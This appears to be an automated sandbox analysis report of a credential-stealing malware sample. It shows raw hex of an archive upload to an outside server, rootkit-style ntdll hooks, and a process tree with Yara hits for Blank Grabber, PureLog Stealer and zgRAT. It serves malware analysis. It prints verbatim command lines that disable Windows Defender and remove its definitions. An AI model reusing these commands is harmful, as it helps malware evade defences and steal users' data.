2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: 2d 2d 37 30 61 30 65 65 36 30 30 34 36 33 35 66 63 64 63 30 65 61 64 62 66 32 30 35 33 38 62 36 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 39 19 9b 57 21 04 00 00 01 0f 3d 07 9e 02 22 8a 83 18 9c 6e 12 8d b8 4a ec cf 48 aa bc 68 db 08 0b bf 7b cf 99 8c f0 76 b3 e6 c0 83 a1 2e d1 8c a9 54 97 e9 73 a1 ad f3 6e f3 cd 21 bd 88 ab f9 2a ec 72 58 e7 19 d7 cd f7 92 3d 63 5a 0e 32 49 fa 4f cc ab 2a 83 54 Data Ascii: --70a0ee6004635fcdc0eadbf20538b64aContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!9W!="nJHh{v.Tsn!rX=cZ2IOT
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: f0 17 c0 9f 37 e3 2a 06 f8 83 d4 32 d4 01 38 97 78 04 ce d0 76 65 97 ea e6 0a aa 55 3c 51 3f e3 7e 57 eb 2c a0 d4 d2 07 86 cc 2e cd e3 c1 69 08 58 e8 ac 52 59 3a 00 5e 3d 89 9b 31 c4 0f e2 66 45 9e 98 a3 10 61 e0 20 9a 64 82 68 98 a7 79 bc e3 63 3b cd d5 22 b0 dc 9e 4d 96 09 46 35 3f 83 a9 ea e5 1f 77 ec 5c 80 0f 59 2a e6 e7 98 d4 05 90 45 49 76 a4 7f 1a 0e 79 0d bb 56 59 32 2c d2 ac 99 e0 41 8a b8 d8 f9 c2 8e 99 c5 4f ef 67 66 9a cb 11 48 42 7e 64 20 52 5d 9c 7a 77 f0 ab b0 67 e3 7c 4f f8 72 03 22 3b 48 b4 57 1e a8 c5 21 fa ae c5 18 47 ed 76 6d 16 4b 7a 36 f5 1c 2e e2 9d 84 7e a5 d8 b1 a2 0a d3 74 0f e4 02 be e0 8d 07 d0 65 b6 60 15 ab 84 b4 ec ef f0 e4 ea 05 3d 90 0d 24 38 fc c1 66 b6 b3 65 01 69 4d d6 a7 4a d6 84 5e 5e cc ae fc 0a d9 22 5d 73 3d 53 14 Data Ascii: 728xveU<Q?~W,.iXRY:^=1fEa dhyc;"MF5?w\YEIvyVY2,AOgfHB~d R]zwg\|Or";HW!GvmKz6.~te`=$8feiMJ^^"]s=S
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: 02 21 eb c2 4b 43 0e 58 51 8b b1 de 55 4c df d0 32 d5 98 e3 55 9c 1a 97 3c 45 f8 f4 ae 65 05 82 a8 f3 5f b4 7a 89 21 10 fa 5f 14 4a 4d f4 0c 6c 53 c3 6b c3 91 ff c6 36 eb c0 c5 24 1e 70 7b f8 5f 09 82 fb f9 ee 34 2e 33 a3 58 53 85 8b 96 ac 19 61 ff c1 91 84 12 b6 59 5d 80 c5 de 3f cc 1c 19 b3 5a 1b 89 68 7c 5d 6a 70 4f ec 8d 5c 0e 12 76 a9 5a 3f 55 13 12 60 c2 c7 68 85 71 32 82 cd 2b 6d a9 ec a0 50 86 09 8a ac f3 db 1e 55 8e 1a fa 2a d2 c9 65 80 ef 6b a7 6b e8 4e 4e 9a 6c 47 bf 59 24 94 63 2f 0c 5a b3 87 56 4a 8a 31 96 d2 d2 27 a2 dd 32 8a f3 ec a8 3c 5d d3 40 d4 63 74 8b 88 18 ba 43 fe 99 db 3c 47 8b 0c 34 0c 37 12 04 b9 88 76 ec 17 03 06 ff f9 41 44 a3 88 43 90 e5 e4 c9 57 0c d6 7a 47 e2 28 08 ef 9f c9 41 bb b3 d6 1a 02 24 a8 5f 61 65 e1 00 0e 05 86 40 Data Ascii: !KCXQUL2U<Ee_z!_JMlSk6$p{_4.3XSaY]?Zh\|]jpO\vZ?U`hq2+mPU*ekkNNlGY$c/ZVJ1'2<]@ctC<G47vADCWzG(A$_ae@
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: 5b 22 39 2c 46 e7 8f 8e 47 df 67 71 80 66 91 35 1f 85 09 e6 9c f6 5b 91 01 b6 f2 8d 9f 69 2e dd 99 d9 84 fd 1b 33 15 f8 19 51 f8 02 b6 56 41 f5 86 7a ea 09 58 9c f5 4c 81 0b 65 72 40 e3 0b 48 20 6c 5c 8c 05 cd d6 9c cd 77 60 8f 33 13 56 a1 65 f3 ae 4f 46 38 06 08 0d 1a ee d5 93 58 9e 3b b7 1d 8e f5 34 7b 3d 33 f6 35 42 29 f3 aa e3 74 7c b9 61 ad 4d 85 b1 36 29 d1 bd 22 01 3c de 5a 52 64 8d 9a cc 74 e8 c7 68 f3 50 68 e8 a0 72 03 1a 1c 0f 63 45 93 4b 01 15 ca 2e d2 1f 93 19 06 13 71 0e c8 a8 45 4b 44 99 68 c3 7c 32 7c 23 d3 f3 b3 6b 1e 06 ce e2 8b ed f8 41 c2 7d 09 e4 c8 f3 a3 45 de e4 54 e7 73 91 f5 40 ce 94 84 02 1e cb 41 ec 73 f6 7f 8e 12 24 23 94 f1 45 b1 73 60 84 d2 7f 08 c1 36 f8 af 68 4b 72 3a ea 15 5c b8 6e 6a cc e8 6f 8e f1 7a 29 27 1d b4 90 08 e1 Data Ascii: ["9,FGgqf5[i.3QVAzXLer@H l\w`3VeOF8X;4{=35B)t\|aM6)"<ZRdthPhrcEK.qEKDh\|2\|#kA}ETs@As$#Es`6hKr:\njoz)'
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: a2 76 cf d3 53 c2 3d 41 9f 65 06 f3 59 ac ac 41 e8 a5 b6 77 23 06 74 be 11 59 82 83 a5 3d 54 a7 af f2 5f 24 58 aa 96 71 76 ee 4b c7 33 a3 e0 e6 3f ae fe f5 be 36 65 02 94 74 42 10 65 a8 d7 3b 3d f2 83 ac 8d a6 62 79 95 f6 b3 04 7a c1 4d e1 7f 27 f1 c6 2b 80 90 b1 b0 87 a3 ce 3a 7e 9e 99 a6 40 e1 71 ce be 4d 1c b4 9a 48 0f c0 97 ef e4 46 b8 2f e1 e0 de f7 0b ee fe bb 72 26 0d 13 03 b4 e9 4b d6 b4 3e d0 a8 58 92 77 ad 5d b4 ee 11 49 88 2e 08 18 c2 2d d3 24 bc 27 38 18 09 87 9d bc f2 94 c8 8e 8f f9 45 f5 91 b4 49 c2 2a d8 09 c1 77 44 7d 4c 43 a6 cf 47 69 cb b9 26 f6 71 ad 34 f4 f3 cb d3 af 45 d4 a3 8e 42 aa 38 c4 0a e9 85 11 d6 08 f5 1a ac 6e c1 aa f8 5e 4b 89 b9 a6 15 76 7e 7b 11 3a c7 8b a3 e4 d7 b1 93 c3 92 56 e3 71 f7 91 8e f8 c4 b2 99 d7 79 04 20 06 17 Data Ascii: vS=AeYAw#tY=T_$XqvK3?6etBe;=byzM'+:~@qMHF/r&K>Xw]I.-$'8EI*wD}LCGi&q4EB8n^Kv~{:Vqy
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: ae 0a a3 b7 cb 2f 13 b2 7f a1 b3 13 d5 52 93 fe 83 51 a5 a1 ba 58 67 02 73 80 24 fa 22 fb f0 66 af d3 c6 76 2a 72 04 bb 69 f5 a5 bb 56 16 94 56 6f 81 dd b1 1b d6 2c 3a 35 29 d8 64 f0 f0 84 fe 99 d4 b4 08 e5 fc e1 6c 06 ba 8e 8d 76 af d8 70 f1 27 5f a5 7d 47 b9 51 c4 8d b5 f6 4e c4 1f 58 45 d1 c1 60 50 1e cd 90 55 34 c7 2e da 23 4a 11 a6 e2 4c b4 9d 5c 15 90 38 03 73 b4 e2 42 4a d4 58 f5 57 db 9b f1 ce 8c ba aa be 0b 75 70 d6 f8 1f ba 8e 09 4f 7a da 05 0f a7 cb 33 43 68 96 39 6d 36 bc de 7c 53 be ce 93 5e d6 e0 76 05 b8 64 1c 25 6c 0a d5 8a 42 77 29 d5 ba c4 88 cf a1 4a d0 fa 8e 2c 65 41 77 7a ad 72 5f 1e 97 48 50 82 fa 76 8a c7 1d 5e 52 15 00 0e 06 27 e0 a7 46 82 1e 38 91 d3 9e f6 5a 51 2d 1b 15 b1 72 8d ff 2d ec 32 4f b9 48 60 43 74 80 98 fe 75 07 81 21 Data Ascii: /RQXgs$"fv*riVVo,:5)dlvp'_}GQNXE`PU4.#JL\8sBJXWupOz3Ch9m6\|S^vd%lBw)J,eAwzr_HPv^R'F8ZQ-r-2OH`Ctu!
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: d8 0c 32 c7 06 21 86 2d b8 ca f1 ea ea d7 b5 71 9e da ff 37 ba 8d 3d be 66 7f ec 60 17 86 c1 55 bc 39 72 2f c3 76 ba b9 0a 92 31 b0 b0 db cf 56 2b 77 ff c5 45 47 36 bf dc 5f 65 5d 56 15 e6 6f 4a 83 14 62 03 5c 17 19 ac 9d dd b7 17 56 4c 9c 8b 8e 4e a1 98 3b a4 59 4a 1e b2 17 8c f4 03 81 d0 d5 42 62 7a 6d f7 79 f2 bf dc 70 74 43 20 e3 49 55 d9 44 46 3c a8 0d 7b 03 f3 12 22 af f7 3d bd dc 20 84 b4 0a 3f 62 2e 0a ce e4 ef 8b 98 89 6a 03 df f3 8f b3 b1 f5 23 1c 6b 80 74 37 9c 50 bc dd 38 93 cf c5 b0 69 d9 52 e4 83 0c 9d 6d 81 d0 93 23 51 53 6d ce e1 6d e9 83 7f 92 09 ec 8f ee 66 83 3f 34 38 e9 52 c8 84 47 73 ac 21 be 35 46 1e 84 50 d9 5e c0 8b ce 55 18 9a ad 20 12 46 dd 6e 68 fd ef a8 b8 0d 5d 27 76 de 58 20 18 4b eb 30 62 01 20 0b 06 2f 7e fa 93 d5 f0 9f 7d Data Ascii: 2!-q7=f`U9r/v1V+wEG6_e]VoJb\VLN;YJBbzmyptC IUDF<{"= ?b.j#kt7P8iRm#QSmmf?48RGs!5FP^U Fnh]'vX K0b /~}
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: 50 e0 32 81 cc 07 76 c7 74 9d 2d 25 3d 8f 08 6b a9 31 c1 5e a0 0a 98 a5 cf 66 1c ee 95 47 e1 6e 8b 1c 7e e8 f6 07 09 69 d6 20 78 55 ee 1c b5 0a 6d 1b ee 14 19 90 5c 88 5b e8 8c 92 aa e8 a5 5f 86 f7 c6 39 2f 27 8f b5 fa 79 d8 df 95 a8 f5 ba 1a be 52 b6 c8 ff 38 2f 55 70 d6 ba cf 8b c1 19 6d 2f 86 1e bd 25 52 51 4a 39 34 c4 66 f9 25 72 22 a0 91 ae 75 1d 63 5f 1c ff a1 0f 43 67 1d af 4b 55 10 41 7d c2 09 0f 00 cd 10 4b 61 70 92 fd ca 4d e3 35 f3 36 c7 60 39 6a 8b 71 7e b1 ad 80 6d d2 99 ff 19 30 73 13 f3 1a 22 5d d4 0f 8a 4c cf 86 56 b8 24 29 8d 47 08 36 8a 7f 45 89 38 11 ac 20 3d bb 6c 59 f5 b7 f2 e9 b2 96 e9 0b 4a cf a1 c9 f2 aa 38 64 91 15 05 f7 c8 bc 43 55 b2 c7 af 5e a6 fa ad ad 12 87 7d 92 dd 0c 8d 12 33 a2 c3 26 f7 27 9d f6 03 9c 3d 76 f5 97 31 db 9c Data Ascii: P2vt-%=k1^fGn~i xUm\[_9/'yR8/Upm/%RQJ94f%r"uc_CgKUA}KapM56`9jq~m0s"]LV$)G6E8 =lYJ8dCU^}3&'=v1
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: e6 76 d5 15 11 f2 1c cb d8 20 56 a9 01 4c 21 3d e2 26 c9 e0 b7 ef e2 09 c0 42 fe 59 9f 8d 5b 47 4b ad 1c 38 a4 05 c1 96 0e 1d 2b 2a e4 60 a6 ac 88 0c 88 91 ab 4d cf fe cf 7e 9a af 8e ab 07 15 b7 b0 06 70 64 1d fb 9e 1b e9 4f b4 b2 7e 6e 8c 15 cc be 09 c3 2a 97 31 30 53 12 79 8a 14 08 ee 64 d3 10 d2 8f d9 7d 19 07 bd f1 a8 f1 c3 7b 61 83 6f 4f 7e 27 9d a0 81 64 9f 61 66 48 09 6e 08 44 a2 94 a9 7f 35 9c 7d 3e 08 18 46 ce ac 47 71 11 48 e2 38 51 bc d8 3c af 1e 98 3e dd a9 f3 de be 51 02 f1 ff db 11 d3 01 3b b4 a8 15 aa ef b1 62 36 4a 69 59 5f 81 92 63 43 fa fb 89 28 35 c6 ca 10 31 fd 92 b2 53 46 96 2e 3e b3 f0 1f e6 b5 45 e4 80 c0 1d c2 31 ca 2c 60 3b 36 93 60 a7 65 31 56 60 7f a9 92 cf 7f b0 02 9e 1d 56 8f 17 34 52 5e d4 e4 a6 b4 40 ea 14 a1 d1 7f 7e 2f 4a Data Ascii: v VL!=&BY[GK8+`M~pdO~n10Syd}{aoO~'dafHnD5}>FGqH8Q<>Q;b6JiY_cC(51SF.>E1,`;6`e1V`V4R^@~/J
2024-08-01 22:08:05 UTC	16384	OUT	Data Raw: 0a 07 69 17 38 78 b3 a1 2b bd bc f3 ca 6a f7 e1 e6 dd bf 66 da 6b ac bc 1c 5e 44 71 0d 87 80 a6 e5 c4 2c ed 4d 3e 3b 10 39 45 d1 42 86 fe e9 64 96 5d a9 17 fb 29 4c 07 33 a5 64 8b 9f 18 68 06 bc 40 51 d0 0c f7 e6 4b fd 7e 14 73 15 66 52 63 a2 a7 18 31 e5 27 34 e6 c9 db 22 53 b8 97 20 fa 77 d2 ad b8 89 9a fc 80 6b 76 91 c5 f9 a4 a5 f9 04 4e 81 54 1d 49 1f b7 e0 97 69 7d 77 2f ae 10 cf a7 03 db 0c 48 4a 4d cb e7 b5 70 59 3f 86 99 7f 62 8b ba 86 e8 77 b7 38 8d 23 07 fa 9b 46 d0 78 e5 48 a5 60 53 9a 7e 60 91 ee 9c 29 c0 95 96 d4 80 61 96 7d d0 80 86 0d 08 b4 ea f7 e9 63 e4 32 9a f5 ed d4 97 21 46 2e 73 25 5f e0 bf 32 e1 95 5b a3 4b 42 c5 4e 0b 41 a2 62 08 d9 78 0f 70 f3 04 1a 6f 7a dc ab ba 80 5b e4 56 2f 93 83 62 ea e9 12 b7 69 16 5e 21 34 8e 87 8c a8 c6 72 Data Ascii: i8x+jfk^Dq,M>;9EBd])L3dh@QK~sfRc1'4"S wkvNTIi}w/HJMpY?bw8#FxH`S~`)a}c2!F.s%_2[KBNAbxpoz[V/bi^!4r
2024-08-01 22:08:07 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 01 Aug 2024 22:08:06 GMT Content-Type: application/json Content-Length: 1701 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	18:07:02
Start date:	01/08/2024
Path:	C:\Users\user\Desktop\VaTlw2kNGc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\VaTlw2kNGc.exe"
Imagebase:	0x7ff7691a0000
File size:	22'154'667 bytes
MD5 hash:	21DD41D299117FE5C556AFC317F9FCBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:07:03
Start date:	01/08/2024
Path:	C:\Users\user\Desktop\VaTlw2kNGc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\VaTlw2kNGc.exe"
Imagebase:	0x7ff7691a0000
File size:	22'154'667 bytes
MD5 hash:	21DD41D299117FE5C556AFC317F9FCBF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:07:03
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:07:03
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:07:03
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
Imagebase:	0x920000
File size:	17'830'453 bytes
MD5 hash:	4FEC8FAF6590F62034AD44A54175B9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:07:05
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff692970000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:07:05
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff7d1540000
File size:	6'127'126 bytes
MD5 hash:	838A5BD59DE32F425938CBA6C119CBEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:07:06
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff692970000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:07:06
Start date:	01/08/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff7d1540000
File size:	6'127'126 bytes
MD5 hash:	838A5BD59DE32F425938CBA6C119CBEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:07:06
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:07:06
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:07:06
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Imagebase:	0x630000
File size:	6'361'390 bytes
MD5 hash:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x8e0000
File size:	4'042'529 bytes
MD5 hash:	45C59202DCE8ED255B4DBD8BA74C630F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff690c40000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
